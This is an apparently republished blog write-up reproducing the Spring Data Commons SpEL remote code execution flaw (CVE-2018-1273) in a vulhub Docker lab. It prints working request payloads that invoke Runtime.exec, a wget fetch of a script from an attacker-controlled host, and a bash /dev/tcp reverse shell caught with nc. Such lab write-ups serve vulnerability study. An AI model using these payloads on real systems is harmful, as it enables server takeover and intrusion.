Spring Data Commons remote command execution vulnerability recurrence (CVE-2018-1273)

Language 2023-09-11 20:07:47 views: null

1. Vulnerability Description
Spring Data is an open source framework used to simplify database access and support cloud services. It includes Commons, Gemfire, JPA, JDBC, MongoDB and other modules. This vulnerability occurs in the Spring Data Commons component, which provides a shared basic framework, is suitable for use by various sub-projects, and supports cross-database persistence.

There is a remote code execution vulnerability in the Spring Data Commons component. An attacker can construct a SPEL expression containing malicious code to implement remote code attacks and directly obtain server control permissions.
2. Affected versions
Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)
3. Set up the environment
cd vulhub/spring/CVE-2018-1273
docker-compose up -d
Insert image description here

4. Vulnerability Reproduction
1. Prepare the shell command
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
to write the file shell.sh
Insert image description here

2. Enable the http service.
Enable the http service in the directory where the sh file is located
. python -m http.server 8081
Insert image description hereInsert image description here

3. Capture packets
: visit http://192.168.25.128:8080/users, register, and BP capture packets
Insert image description hereInsert image description here

4. Prepare the request package
Payload:
username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“[Command to be executed]”)]=&password=&repeatedPassword=Download
file Request package: username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168. 155.2:8081/shell.sh”)]&password=test&repeatedPassword=test
Execute command request package:
username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/bin/ bash /tmp/1.sh”)]&password=test&repeatedPassword=test
5.nc turns on monitoring
Insert image description here

6. Send request package
Send download package
Insert image description here

Found that 1.sh appeared in tmp
Insert image description hereInsert image description here

Send execution package
Insert image description here

7. Rebound shell
Insert image description here

Note:
Correct usage of wget:
Use the -O option to save the downloaded file under another name
wget -O /usr/software https://download.redis.io/releases/redis-6.0.8.tar.gz

Guess you like

Origin blog.csdn.net/wutiangui/article/details/132790803
Recommended
Ranking
Linux关机和重启详解(shutdown、halt、poweroff、reboot、init)
Netty work notes 0007---NIO's three core component relationships
Knife4j tutorial
2021.10.29,内容:什么时候用接口和抽象类
How to solve the problem that changing the memory frequency causes the computer to become unusable?
SpringMVC Tutorial - Controller
linux learning skills -Linux 25 transport Vega paid special privileges and facl extension
Financial quarterly report evaluation report data automatic generation 1.0
Agile Development Series - The Values of Agile Development
scrapy achieve browsercookie Middleware
Daily
More
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)

Code World

© 2018 codetd.com